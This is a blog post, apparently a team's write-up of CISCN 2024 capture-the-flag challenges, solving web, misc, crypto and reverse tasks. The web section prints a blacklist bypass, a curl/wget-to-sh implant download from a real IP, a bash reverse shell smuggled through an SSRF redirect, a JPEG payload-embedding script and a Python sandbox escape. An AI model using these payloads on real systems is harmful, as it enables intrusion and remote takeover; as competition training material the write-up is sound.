{"id":326,"date":"2024-05-20T21:40:34","date_gmt":"2024-05-20T13:40:34","guid":{"rendered":"http:\/\/www.s1mh0.cn\/blog\/?p=326"},"modified":"2024-06-06T23:46:27","modified_gmt":"2024-06-06T15:46:27","slug":"ciscn_2024","status":"publish","type":"post","link":"https:\/\/www.s1mh0.cn\/blog\/index.php\/2024\/05\/20\/ciscn_2024\/","title":{"rendered":"\u7b2c\u5341\u4e03\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b\u521d\u8d5b- WriteUp by \u5e7f\u5916\u5973\u751f"},"content":{"rendered":"

WEB<\/h1>\n

Simple_php<\/h2>\n
<?php\nini_set('open_basedir', '\/var\/www\/html\/');\nerror_reporting(0);\n\nif(isset($_POST['cmd'])){\n    $cmd = escapeshellcmd($_POST['cmd']); \n     if (!preg_match('\/ls|dir|nl|nc|cat|tail|more|flag|sh|cut|awk|strings|od|curl|ping|\\*|sort|ch|zip|mod|sl|find|sed|cp|mv|ty|grep|fd|df|sudo|more|cc|tac|less|head|\\.|{|}|tar|zip|gcc|uniq|vi|vim|file|xxd|base64|date|bash|env|\\?|wget|\\'|\\"|id|whoami\/i', $cmd)) {\n         system($cmd);\n}\n}\n\nshow_source(__FILE__);\n?><\/code><\/pre>\n
\u4f7f\u7528php -r\u6267\u884cphp\u4ee3\u7801\uff0c\u5229\u7528bin2hex\u8fdb\u884c\u7ed5\u8fc7<\/p>\n
<?php\n$a = ';ls \/';\necho bin2hex($a);\n\n\/\/3b6c73202f<\/code><\/pre>\n
\u524d\u9762\u52a0\u4fe9\u5b57\u6bcd\uff0c\u4e0d\u7136\u4f1a\u62a5\u9519\u6ca1\u6cd5\u6267\u884c<\/p>\n
php -r $a=aa3b6c73202f;system(hex2bin($a));<\/code><\/pre>\n
\u53cd\u5f39shell\uff0c\u6ca1\u627e\u5230flag\uff0c\u4f46\u662f\u5728passwd\u91cc\u9762\u53d1\u73b0\u4e86mysql\u7528\u6237<\/p>\n
root:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nmysql:x:101:101:MySQL Server,,,:\/nonexistent:\/bin\/false<\/code><\/pre>\n
\u4f46\u662f\u597d\u50cf....\u6ca1\u6cd5\u8fdb\u6570\u636e\u5e93\uff0c\u6240\u4ee5\u9009\u62e9vshell\u4e0a\u7ebf\uff0c\u5f31\u53e3\u4ee4\u767b\u5f55<\/p>\n
(curl -fsSL -m180 110.41.17.183:8084\/slt||wget -T180 -q 110.41.17.183:8084\/slt)|sh<\/code><\/pre>\n
\"\"\u200b<\/p>\n
\"\"<\/p>\n
\u6267\u884c\u547d\u4ee4\u62ff\u5230flag<\/p>\n
easycms<\/h2>\n
\u6839\u636e\u63d0\u793a\u626b\u63cf\u76ee\u5f55\uff0c\u53d1\u73b0flag.php<\/p>\n
\u8bbf\u95ee\u53d1\u73b0\u63d0\u793a127.0.0.1\u8fd8\u662f\u4ec0\u4e48\u7684\uff0c\u57fa\u672c\u53ef\u4ee5\u786e\u5b9a\u662fssrf\uff0c\u540e\u9762\u5c31\u5f00\u59cb\u5bfb\u627essrf\u70b9\uff0c\u4ecegithub\u4e0b\u8f7d\u6e90\u7801\uff0c\u641c\u7d22curl_setopt<\/code>\u200b\uff0c\u627e\u5230\u4e86Hepler.php\u4e2d\u7684\u4e00\u4e2a\u65b9\u6cd5\uff0c\u540e\u9762\u5c31\u662f\u5168\u5c40\u67e5\u627e\u54ea\u91cc\u8c03\u7528\u4e86\u8be5\u65b9\u6cd5\uff0c\u53d1\u73b0\u5b58\u5728\u4e24\u5904\uff0c\u6d4b\u8bd5\u53e6\u4e00\u5904\u6392\u9664\u540e\u5c31\u53ea\u5269\u4e0b\u4e86api.php<\/p>\n
https:\/\/forum.butian.net\/share\/1072<\/a><\/p>\n
\u6839\u636e\u8be5\u8fde\u63a5\u5f97\u77e5\u4e86\u8be5cms\u7684\u8c03\u7528\u6a21\u5f0f<\/p>\n
\"\"\u7ee7\u7eed\u67e5\u770b\u4e8c\u67e5\u770b\u624b\u518c<\/p>\n
https:\/\/www.xunruicms.com\/doc\/1061.html<\/a><\/p>\n
\u4e86\u89e3\u8be5cms\u8c03\u7528\u65b9\u6cd5\u7684\u5177\u4f53\u6d41\u7a0b\uff0c\u6240\u4ee5\u5c31\u662f\u8c03\u7528api\u4e2d\u8c03\u7528\u4e86\u8be5\u65b9\u6cd5\u7684\u90a3\u4e2a\u65b9\u6cd5<\/p>\n
index.php?s=api&c=api&m=qrcode&text=a&thumb=http:\/\/110.41.17.183:251\/location.php<\/code><\/pre>\n
GIF89a\n<?php\nheader("Location:http:\/\/127.0.0.1\/flag.php?cmd=bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F110.41.17.183%2F250%200%3E%261%22");\/\/bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F110.41.17.183%2F250%200%3E%261%22\n?><\/code><\/pre>\n
\u53cd\u5f39shell\uff0c\u6267\u884c\/readflag\u62ff\u5230flag<\/p>\n
easycms_revenge<\/h2>\n
\u5bf9\u56fe\u7247\u591a\u4e86\u4e00\u4e2a\u68c0\u6d4b\uff0c\u6240\u4ee5\u5c1d\u8bd5\u628apayload\u6e32\u67d3\u8fdb\u53bb<\/p>\n
<?php\n$miniPayload = '?><?php header("Location:http:\/\/127.0.0.1\/flag.php?cmd=bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F110.41.17.183%2F250%200%3E%261%22");?>';\n\nif(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) {\n    die('php-gd is not installed');\n}\n\nif(!isset($argv[1])) {\n    die('php jpg_payload.php <jpg_name.jpg>');\n}\n\nset_error_handler("custom_error_handler");\n\nfor($pad = 0; $pad < 1024; $pad++) {\n    $nullbytePayloadSize = $pad;\n    $dis = new DataInputStream($argv[1]);\n    $outStream = file_get_contents($argv[1]);\n    $extraBytes = 0;\n    $correctImage = TRUE;\n\n    if($dis->readShort() != 0xFFD8) {\n        die('Incorrect SOI marker');\n    }\n\n    while((!$dis->eof()) && ($dis->readByte() == 0xFF)) {\n        $marker = $dis->readByte();\n        $size = $dis->readShort() - 2;\n        $dis->skip($size);\n        if($marker === 0xDA) {\n            $startPos = $dis->seek();\n            $outStreamTmp =\n                substr($outStream, 0, $startPos) .\n                $miniPayload .\n                str_repeat("\\0",$nullbytePayloadSize) .\n                substr($outStream, $startPos);\n            checkImage('_'.$argv[1], $outStreamTmp, TRUE);\n            if($extraBytes !== 0) {\n                while((!$dis->eof())) {\n                    if($dis->readByte() === 0xFF) {\n                        if($dis->readByte !== 0x00) {\n                            break;\n                        }\n                    }\n                }\n                $stopPos = $dis->seek() - 2;\n                $imageStreamSize = $stopPos - $startPos;\n                $outStream =\n                    substr($outStream, 0, $startPos) .\n                    $miniPayload .\n                    substr(\n                        str_repeat("\\0",$nullbytePayloadSize).\n                        substr($outStream, $startPos, $imageStreamSize),\n                        0,\n                        $nullbytePayloadSize+$imageStreamSize-$extraBytes) .\n                    substr($outStream, $stopPos);\n            } elseif($correctImage) {\n                $outStream = $outStreamTmp;\n            } else {\n                break;\n            }\n            if(checkImage('payload_'.$argv[1], $outStream)) {\n                die('Success!');\n            } else {\n                break;\n            }\n        }\n    }\n}\nunlink('payload_'.$argv[1]);\ndie('Something\\'s wrong');\n\nfunction checkImage($filename, $data, $unlink = FALSE) {\n    global $correctImage;\n    file_put_contents($filename, $data);\n    $correctImage = TRUE;\n    imagecreatefromjpeg($filename);\n    if($unlink)\n        unlink($filename);\n    return $correctImage;\n}\n\nfunction custom_error_handler($errno, $errstr, $errfile, $errline) {\n    global $extraBytes, $correctImage;\n    $correctImage = FALSE;\n    if(preg_match('\/(\\d+) extraneous bytes before marker\/', $errstr, $m)) {\n        if(isset($m[1])) {\n            $extraBytes = (int)$m[1];\n        }\n    }\n}\n\nclass DataInputStream {\n    private $binData;\n    private $order;\n    private $size;\n\n    public function __construct($filename, $order = false, $fromString = false) {\n        $this->binData = '';\n        $this->order = $order;\n        if(!$fromString) {\n            if(!file_exists($filename) || !is_file($filename))\n                die('File not exists ['.$filename.']');\n            $this->binData = file_get_contents($filename);\n        } else {\n            $this->binData = $filename;\n        }\n        $this->size = strlen($this->binData);\n    }\n\n    public function seek() {\n        return ($this->size - strlen($this->binData));\n    }\n\n    public function skip($skip) {\n        $this->binData = substr($this->binData, $skip);\n    }\n\n    public function readByte() {\n        if($this->eof()) {\n            die('End Of File');\n        }\n        $byte = substr($this->binData, 0, 1);\n        $this->binData = substr($this->binData, 1);\n        return ord($byte);\n    }\n\n    public function readShort() {\n        if(strlen($this->binData) < 2) {\n            die('End Of File');\n        }\n        $short = substr($this->binData, 0, 2);\n        $this->binData = substr($this->binData, 2);\n        if($this->order) {\n            $short = (ord($short[1]) << 8) + ord($short[0]);\n        } else {\n            $short = (ord($short[0]) << 8) + ord($short[1]);\n        }\n        return $short;\n    }\n\n    public function eof() {\n        return !$this->binData||(strlen($this->binData) === 0);\n    }\n}\n?><\/code><\/pre>\n
\u968f\u4fbf\u641e\u4e00\u4e2ajpg\uff0c\u8d8a\u5c0f\u8d8a\u597d\uff0c\u907f\u514d\u62a5\u9519<\/p>\n
php poc.php xxx.jpg<\/code><\/pre>\n
\u6539\u540e\u7f00\u4e3aphp\uff0c\u653e\u5230vps\u4e0a\u9762\u505a\u8df3\u8f6c\uff0c\u53cd\u5f39shell\uff0c\u62ff\u5230flag<\/p>\n
\"image\"<\/p>\n
mossfern<\/h2>\n
\u53c2\u8003 L3HCTF <\/code>\u200b\u7684 intractable problem<\/code>\u200b\uff0c\u8fc7\u6ee4\u90fd\u5dee\u4e0d\u591a<\/p>\n
https:\/\/c1oudfl0w0.github.io\/blog\/2024\/02\/04\/L3HCTF-2024\/<\/a><\/p>\n
\u6839\u636e\u94fe\u63a5\u5f97\u5230\u9003\u9038\u5230\u5168\u5c40\u7684\u4ee3\u7801<\/p>\n
def factorization():\n    a=(a.gi_frame.f_back.f_back for i in [1])\n    a=[x for x in a][0]\n    globals=a.f_back.f_back.f_globals\n    builtin = globals["_" + "_builtins_" + "_"]\n    print(globals)\nfactorization()<\/code><\/pre>\n
open\u88abban\u4e86\u6ca1\u6cd5\u8bfb\u6587\u4ef6\uff0c\u540e\u7eed\u601d\u8def\u662f\u60f3\u7740\u8bfb\u5f53\u524d\u8fd0\u884c\u7a0b\u5e8f\u7684\u6e90\u7801<\/p>\n
\"image\"<\/p>\n
\u7528 f_code<\/code>\u200b \u83b7\u53d6\u5f53\u524d\u6267\u884c\u7684\u4ee3\u7801\u6bb5\uff0c\u7136\u540e\u8bfb\u53d6\u51fa\u6765\u5373\u53ef<\/p>\n
def factorization():\n    a=(a.gi_frame.f_back.f_back for i in [1])\n    a=[x for x in a][0]\n    globals=a.f_back.f_back.f_globals\n    b=a.f_back.f_back.f_code\n    builtin = globals["_" + "_builtins_" + "_"]\n    dir=builtin.dir\n    #print(dir(b))\n    str=builtin.str\n    for i in str(b.co_consts):\n        print(i, end=',')\n\nfactorization()<\/code><\/pre>\n
\"image\"<\/p>\n
\u200d<\/p>\n
Misc<\/h1>\n
\u706b\u9505\u94fe\u89c2\u5149\u6253\u5361<\/h2>\n
\u706b\u72d0\u4e0b\u8f7dMetaMask\u63d2\u4ef6\uff0c\u8fde\u63a5\u94b1\u5305\u7b54\u9898\uff0c\u5151\u6362NFT\u663e\u793aflag<\/p>\n
<\/p>\n
flag{y0u_ar3_hotpot_K1ng}<\/p>\n
\u795e\u79d8\u6587\u4ef6<\/h2>\n
\u770b\u6587\u4ef6\u5c5e\u6027\u53d1\u73b0\u5bc6\u6587\u3001\u52a0\u5bc6\u65b9\u5f0f\u548c\u5bc6\u94a5key\uff0c\u89e3\u5bc6\u5f97\u5230part1\uff1aflag{e<\/p>\n

\n<\/p>\n
\u5728embeddings\u7684word\u6587\u4ef6\u770b\u5230casesar\u63d0\u793a\uff0c\u5c06word\u6539zip\u540e\u7f00\uff0c\u5728document.xml\u53ef\u4ee5\u770b\u5230\u5bc6\u6587\uff0c\u5f97 \u5230part2 \uff1a675efb<\/p>\n

\n<\/p>\n
\u5c06ppt\u4e2d\u7684vbaProject.bin\u6587\u4ef6\u4e22\u5230\u4e91\u6c99\u7bb1\uff0c\u53ef\u4ee5\u5f97\u5230\u5b8c\u6574\u5b8f\u4ee3\u7801<\/p>\n
Sub crypto(sMessage, strKey)\n    Dim kLen, x, y, i, j, temp\n    Dim s(256), k(256)\n\n    kLen = Len(strKey)\n    For i = 0 To 255\n        s(i) = i\n        k(i) = Asc(Mid(strKey, (i Mod kLen) + 1, 1))\n    Next\n\n    j = 0\n    For i = 0 To 255\n        j = (j + k(i) + s(i)) Mod 256\n        temp = s(i)\n        s(i) = s(j)\n        s(j) = temp\n    Next\n\n    x = 0\n    y = 0\n\n    For i = 1 To 3072\n        x = (x + 1) Mod 256\n        y = (y + s(x)) Mod 256\n        temp = s(x)\n        s(x) = s(y)\n        s(y) = temp\n    Next\n\n    For i = 1 To Len(sMessage)\n        x = (x + 1) Mod 256\n        y = (y + s(x)) Mod 256\n        temp = s(x)\n        s(x) = s(y)\n        s(y) = temp\n\n        crypto = crypto & (s((s(x) + s(y)) Mod 256) Xor Asc(Mid(sMessage, i, 1))) & ","\n    Next\n    'i13POMdzEAzHfy4dGS+vUA==(After base64)\nEnd Sub<\/code><\/pre>\n
\u641c\u7d22\u90e8\u5206\u4ee3\u7801\u53d1\u73b0\u662fRC4\u52a0\u5bc6\uff0c\u7528\u53a8\u5b50\u5f97\u5230part3 \uff1a3-34<\/p>\n
<\/p>\n
\u5728ppt\u53ef\u4ee5\u76f4\u63a5\u770b\u5230\u624b\u7ed8\u7684\u5b57\u7b26\u4e32 UGFSdDQ6NmYtNDA=  \uff0c base64\u5f97\u5230part4 \uff1a6f-40<\/p>\n
<\/p>\n
\u5728\u7b2c\u4e94\u9875ppt\u5e95\u90e8\u6709\u5907\u6ce8\u4fe1\u606f\uff0c\u591a\u5c42base64\u89e3\u5bc6\u5f97\u5230part5 \uff1a5f-90d<\/p>\n
\"\"<\/p>\n
\u5728media\u91cc\u5c06\u5b57\u6bcd\u56fe\u7247\u62fc\u63a5\u5f97\u5230 UGFyVDY6ZC0y \uff0c base64\u89e3\u5bc6part6 \uff1ad-2<\/p>\n
\"\"<\/p>\n
\u5728slides\\slide4.xml\u6587\u4ef6\u80fd\u770b\u5230\u5bc6\u6587\uff0c\u5e76\u63d0\u793a\u7528ROT13\uff0c\u5f97\u5230part7 \uff1a22b3<\/p>\n

\n<\/p>\n
\u5728slideLayout2.xml\u770b\u5230\u5bc6\u6587\uff0c\u5e76\u4e14\u5c1d\u8bd5\u53d1\u73b0\u5c06\u5b57\u7b26\u4e2d\u7684 B \u3001 b \u3001 1 \u3001 3 \u53bb\u6389\u518dbase64\u89e3\u5bc6\u5f97\u5230 part8 \uff1a87e<\/p>\n
\"\"<\/p>\n
\u5728media\u4e2d\u53d1\u73b0\u5176\u4e2d\u4e00\u4e2ajpg\u5e95\u4e0b\u6709\u5bc6\u6587 cGFyVDk6ZGVl \uff0c base64\u89e3\u5bc6\u5f97\u5230part9 \uff1adee<\/p>\n
<\/p>\n
\u5728comments\/comment1.xml\u770b\u5230\u7ef4\u5409\u5c3c\u4e9a\u5bc6\u6587\u548c\u5bc6\u94a5\uff0c\u89e3\u5bc6\u5f97\u5230part10 \uff1a9}<\/p>\n

\n<\/p>\n
\u62fc\u63a510\u4e2a\u90e8\u5206\u5f97\u5230\u5b8c\u6574flag\uff1aflag{e675efb3-346f-405f-90dd-222b387edee9}<\/p>\n
Power Trajectory Diagram<\/h2>\n
npz\u4e3b\u8981\u6709\u4e09\u4e2a\u5c5e\u6027\uff0c trace\u3001 input\u548cindex\uff0cnpz\u4e3b\u8981\u6709\u4e09\u4e2a\u5c5e\u6027\uff0ctrace\u3001input\u548cindex\uff0c\u8ba1\u7b97trace\u4e2d\u6bcf\u7ec4\u7684\u65b9\u5dee\uff0c\u65b9\u5dee\u8d8a\u5927\u8bf4\u660e\u529f\u8017\u8d8a\u5927\uff0c\u4e5f\u5c31\u662f\u6309\u4e0b\u4e86\u6309\u952e\uff0c\u8bb0\u5f55\u5176\u7d22\u5f15\u4e0e\u5bf9\u5e94input\u7684\u5b57\u7b26\uff0cexp\u5982\u4e0b<\/p>\n
import numpy as np\n\ndata = np.load('attachment.npz')\n_trace = data['trace']\n_input = data['input']\n_indexes = []\n\ndef variance(trace, group):\n    sum = 0\n    for tra in group:\n        if not np.array_equal(trace, tra):\n            sum += np.mean((trace - tra) ** 2)\n    return sum \/ len(group)\n\nfor i in range(0, len(_input), 40):\n    group = _trace[i: i + 40]\n    max_variance = 0\n    _traceIndex = i\n\n    for j, trace in enumerate(group):\n        current_variance = variance(trace, group)\n        if current_variance > max_variance:\n            max_variance = current_variance\n            _traceIndex = i + j\n\n    _indexes.append(_traceIndex)\n\nfor i, index in enumerate(_indexes):\n    if i != len(_indexes) - 1:\n        print(_input[index],end="")<\/code><\/pre>\n
flag{ciscn_2024<\/em>}<\/p>\n
\u901a\u98ce\u673a<\/h2>\n
\u5c06mwp\u6587\u4ef6\u7528STEP 7\u6253\u5f00\u663e\u793a\u6587\u4ef6\u65e0\u6548\uff0c\u7ed3\u5408\u9898\u76ee\u63cf\u8ff0\u901a\u98ce\u673a\u574f\u6389\u4e86\u731c\u6d4b\u6570\u636e\u88ab\u4fee\u6539\uff0c\u5728STEP 7\u4e2d\u968f\u610f \u65b0\u5efa\u4e2a\u9879\u76ee\uff0c\u4fdd\u5b58\u67e5\u770b\u5341\u516d\u8fdb\u5236\uff0c\u5bf9\u6bd4\u53d1\u73b0\u9898\u76ee\u9644\u4ef6\u5c11\u4e86\u524d\u4e09\u4e2a\u5b57\u8282\uff0c\u8865\u9f50\u540e\u6253\u5f00<\/p>\n
\"\"<\/p>\n
\u5728\u7b26\u53f7\u8868\u7684\u6ce8\u91ca\u5904\u53d1\u73b0flag<\/p>\n
\"\"<\/p>\n
flag{2467ce26-fff9-4008-8d55-17df83ecbfc2}<\/p>\n
\u76d7\u7248\u8f6f\u4ef6\uff08\u590d\u73b0\uff09<\/h2>\n
\u9898\u76ee\u5185\u5bb9\uff1a\u5728\u7f51\u4e0a\u4e0b\u4e86\u4e00\u4e2a\u76d7\u7248\u8f6f\u4ef6\u5c31\u4e2d\u6bd2\u4e86\uff0c\u4ed6\u4ece\u5185\u5b58\u4e2d\u63d0\u53d6\u4e86\u6587\u4ef6\u548c\u6d4f\u89c8\u5668\uff0c\u8bf7\u5e2e\u52a9\u5206\u6790;\uff08flag\u4e3aflag{md5(\u7f51\u7ad9\u57df\u540d+c2\u5730\u5740)}<\/p>\n
\u9996\u5148\u770b\u5230exe\u751f\u6210\u7684\u56fe\u7247\u4e0a\u9762\u6709\u660e\u663e\u9690\u5199\u75d5\u8ff9\uff0c\u5f53\u65f6zsteg+stegsolve\u7b80\u5355\u7ffb\u4e86\u4e0b\u6ca1\u770b\u51fa\u4ec0\u4e48\u4e1c\u897f\u5c31\u653e\u7740\u4e86\uff0c\u539f\u6765\u662fred\u6bcf\u4e2a\u901a\u9053\u90fd\u8981\u9009\uff08red0\/1\/2\u901a\u9053\u5df2\u7ecf\u770b\u4e0d\u51fa\u75d5\u8ff9\u4e86\uff09\uff0c\u53d1\u73b0504b0304\u7684zip\u5934\u7279\u5f81\uff0c\u6bcf\u4e2a\u5b57\u8282\u4e2d\u95f4\u6df7\u4e86\u4e2a\u5176\u4ed6\u5b57\u8282\uff0c\u5199\u811a\u672c\u63d0\u53d6<\/p>\n
\"\"<\/p>\n
from PIL import Image\nimage = Image.open(r'output.png')\nallpixels = []\nflag = 1\n\nfor y in range(image.width):\n    for x in range(image.width):\n        if flag == 1:\n            r_pix = image.getpixel((x, y))[0]\n            # print(hex(int(r_pix))[2:].zfill(2))\n            allpixels.append(hex(int(r_pix))[2:].zfill(2))\n        flag *= -1\nwith open("output.txt", 'w') as wf:\n    for i in allpixels:\n        wf.write(str(i))\n#7b020000504b0304140000000800649b5358cec5d11b150200007f020000020000002e620d516d7b816018fd2d77d3ca9a62a827ad2257613cb3c24229497a6588ffbfceb7f3e19cebbcdce9fa57eda20fa83bc08be4759fbd316e11944de3f0ede67cfa5c634c479ae933fd73ed07e5f8d4099c4469f5a2b6fcbb56c5ab0cae32767c111a3f60c2d1970c86fbc621edac78717254c287905ab4176bab6961b117e08ac11e2aa4d3c72d1aa2064bf3f84038260eb8e12f58cbbc81c67cc4b4a0ee2bad8271a828bbcd3fd66ae6eaa440d73eda28bacf44dd2af997f535ac19b916059576be05ebc7d0b16337f48a0a1658f3f78c189dd4110fec28a8e8c3e4a1a1af7850e37651b88ba2ec0a60c81ed15f50944d252532fb77af2ddb96ba08461250e5dac69f82ea9c49b9bf053a2539e42a6f756609df25325ecd3efa7d6212cbfa79289ab7535c76a81351c8de4755afc69edc78cf19f0d95b04b51efbbcf6a2bd7314a3cc5894ada4e9f9c6dad390b4e1a63b4a8cf7a9e4cb4f8c4a55ab42c652ea45379267ec2fd7188e3a44b5d55142a1456fb22239b3d551a656644f4f4f7d899b0d293ea923c96159375c598c9a2eb6dc75f77e182289482975e00eb2ee7a303f02b17b6f55f68e70c9f299cd33abe69f5412afcd2a467785d15d3602e7a66e90b42573ac88e3295cf20d5976ea8712585578f040b65f818a71506d9a930aecfc46935986bdc8ec9e15f72f391ffad34e3e2bdb5a9697c87e4bc16447f6decb63db88e7132157eb1390137dd961675f93673c38b9ff504b01021400140000000...<\/code><\/pre>\n
\u63d0\u53d6\u51fa.b\u6587\u4ef6\uff0c\u5c06\u6587\u4ef6\u5185\u5bb9\u8fdb\u884cbase85\u89e3\u7801\u540e\u4e22\u5165\u5728\u7ebf\u4e91\u6c99\u7bb1\u53ef\u4ee5\u770b\u5230C2\u5730\u5740\uff08\u5b58\u7591\uff1abase85\u89e3\u7801\u8fd9\u6b65\u662f\u5982\u4f55\u5f97\u5230\u7684\uff0c\u7528\u4e86\u53a8\u5b50\u548c\u81ea\u5df1\u5199\u7684base\u5e76\u4e0d\u80fd\u81ea\u52a8\u68c0\u6d4b\u51fa\u8981base85\uff0c\u662f\u9760IDA\u5206\u6790exe\u6587\u4ef6\uff1f\uff09<\/p>\n
\"\"<\/p>\n
\u4e4b\u540e\u5c06dmp\u6587\u4ef6\u4e22\u5230AXIOM\u5206\u6790\uff0c\u5728url\u4e2d\u660e\u663e\u770b\u5230\u6076\u610f\u7f51\u7ad9\u57df\u540d\uff1awinhack.com<\/p>\n
\"\"<\/p>\n
Tough_DNS\uff08\u590d\u73b0\uff09<\/h2>\n
\u9898\u76ee\u5185\u5bb9\uff1aDNS\u7684\u4e16\u754c\u5145\u6ee1\u4e86\u591a\u53d8\u7684\u5b57\u7b26\uff0c\u63a5\u4e0b\u6765\u6211\u5c06\u76f4\u63a5\u7ed9\u4f60\u7b54\u6848\uff1a56 16 26 93 66 53 16 56 d2 03 26 93 56<\/p>\n
\u9996\u5148\u770b\u5230\u4e00\u4e3201<\/p>\n
\"\"\u5148\u7528tshark\u547d\u4ee4\u63d0\u53d6<\/p>\n
tshark -r Tough_DNS.pcapng -Y "ip.dst == 8.8.8.8" -e "dns.qry.name"  -T fields > data.txt <\/code><\/pre>\n
\u5220\u6389\u540e\u9762\u591a\u4f59\u5b50\u57df\u540d\u540e\u7528uniq\u53bb\u91cd\uff0c\u4e4b\u540e\u518d\u8f6c\u4e8c\u7ef4\u7801<\/p>\n
\"\"<\/p>\n
\u5f97\u523015f9792dba5c<\/p>\n
\u540e\u9762\u7684TXT\u7c7b\u578b\u53d1\u73b0\u53ef\u4ee5\u901a\u8fc7dns.id\u5206\u4e3a0x4500\u30010x6421\u4e24\u79cd\u7c7b\u578b\uff0c\u5206\u522b\u63d0\u53d6txt<\/p>\n
tshark -r Tough_DNS.pcapng -Y "dns.id == 0x4500" -e "dns.txt"  -T fields |tr -d "\\n"> 4500.txt\ntshark -r Tough_DNS.pcapng -Y "dns.id == 0x6421" -e "dns.txt"  -T fields |tr -d "\\n"> 6421.txt<\/code><\/pre>\n
\"\"<\/p>\n
4500\u8f6chex\u5f97\u5230\u52a0\u5bc6\u538b\u7f29\u5305\uff0c\u4f7f\u7528\u626b\u63cf\u4e8c\u7ef4\u7801\u5f97\u5230\u7684\u5b57\u7b26\u4e32\u53ef\u4ee5\u63d0\u53d6\u51fa\u4e00\u4e2asecret.gpg\u6587\u4ef6<\/p>\n
\u5c066421\u53bb\u6389\u5934\u5c3e0\u5b57\u8282\u540e\u8f6chex\uff0c\u4f7f\u7528file\u547d\u4ee4\u8bc6\u522b\u51fa\u4e3aPGP\u7684\u52a0\u5bc6\u5185\u5bb9<\/p>\n
PGP RSA encrypted session key - keyid: 44764551 B5B1D8D5 RSA (Encrypt or Sign) 1024b .<\/code><\/pre>\n
\u5728\u5bfc\u5165secret.gpg\u65f6\u9700\u8981\u89e3\u5bc6\u79c1\u94a5\uff0c\u6b64\u65f6\u5c31\u5269\u9898\u76ee\u63cf\u8ff0\u7ed9\u51fa\u7684\u5b57\u7b26\u6ca1\u6709\u7528\u5230\uff0c\u6bcf\u4e2a\u5b57\u8282\u7ffb\u8f6c\u5f97\u5230\u79c1\u94a5eab9f5ae-0b9e<\/p>\n
\"\"<\/p>\n
gpg --import secret.gpg\ngpg --decrypt download.dat<\/code><\/pre>\n
\"\"<\/p>\n
Crypto<\/h1>\n
\u53e4\u5178\u5bc6\u7801<\/h2>\n
\u53a8\u5b50\u4e00\u628a\u68ad<\/p>\n
\"\"<\/p>\n
flag{b2bb0873-8cae-4977-a6de-0e298f0744c3}<\/p>\n
OvO<\/h2>\n
e\u4e24\u8fb9\u4e58p\uff0c\u89e3\u65b9\u7a0b\u80fd\u51fap\u7684\u9ad8\u4f4d\uff0c task.sage\u7684exp\u5982\u4e0b<\/p>\n
from Crypto.Util.number import *\nfrom gmpy2 import *\n\nn = 111922722351752356094117957341697336848130397712588425954225300832977768690114834703654895285440684751636198779555891692340301590396539921700125219784729325979197290342352480495970455903120265334661588516182848933843212275742914269686197484648288073599387074325226321407600351615258973610780463417788580083967\ne = 37059679294843322451875129178470872595128216054082068877693632035071251762179299783152435312052608685562859680569924924133175684413544051218945466380415013172416093939670064185752780945383069447693745538721548393982857225386614608359109463927663728739248286686902750649766277564516226052064304547032760477638585302695605907950461140971727150383104\nc = 14999622534973796113769052025256345914577762432817016713135991450161695032250733213228587506601968633155119211807176051329626895125610484405486794783282214597165875393081405999090879096563311452831794796859427268724737377560053552626220191435015101496941337770496898383092414492348672126813183368337602023823\n\nkk = e \/\/ n - 2\ntmp = 65537 + (kk + 2) * n + (kk + 2) + 1\n\nR.<x> =  PolynomialRing(RealField(1024))\nf = e * x - (2 * (kk + 1) * x ^ 2 + (kk + 2) * n + tmp * x)\nre = f.roots()\n\nfor root in re:\n    p_high = int(root[0])\n    PR.<x> = PolynomialRing(Zmod(n), implementation='NTL')\n    f1 = p_high + x\n    x0 = f1.small_roots(X=2 ^ 200, beta=0.4)\n    if x0:\n        p = int(x0[0]) + p_high\n        q = n \/\/ p\n        e = 65537 + kk * p + (kk + 2) * ((p + 1) * (q + 1)) + 1\n        phi = (p - 1) * (q - 1)\n        d = invert(e, phi)\n        m = pow(c, d, n)\n        print(long_to_bytes(m))\n\n# b'flag{b5f771c6-18df-49a9-9d6d-ee7804f5416c}'<\/code><\/pre>\n
\u200d<\/p>\n
\"\"<\/p>\n
Reverse<\/h1>\n
asm_re<\/h2>\n
\u63d0\u53d64\u5b57\u8282\u4e00\u7ec4\u7684\u5c0f\u7aef\u5e8f\u5bc6\u6587\uff0c\u6839\u636e\u52a0\u5bc6\u7b97\u6cd5\u5199exp<\/p>\n
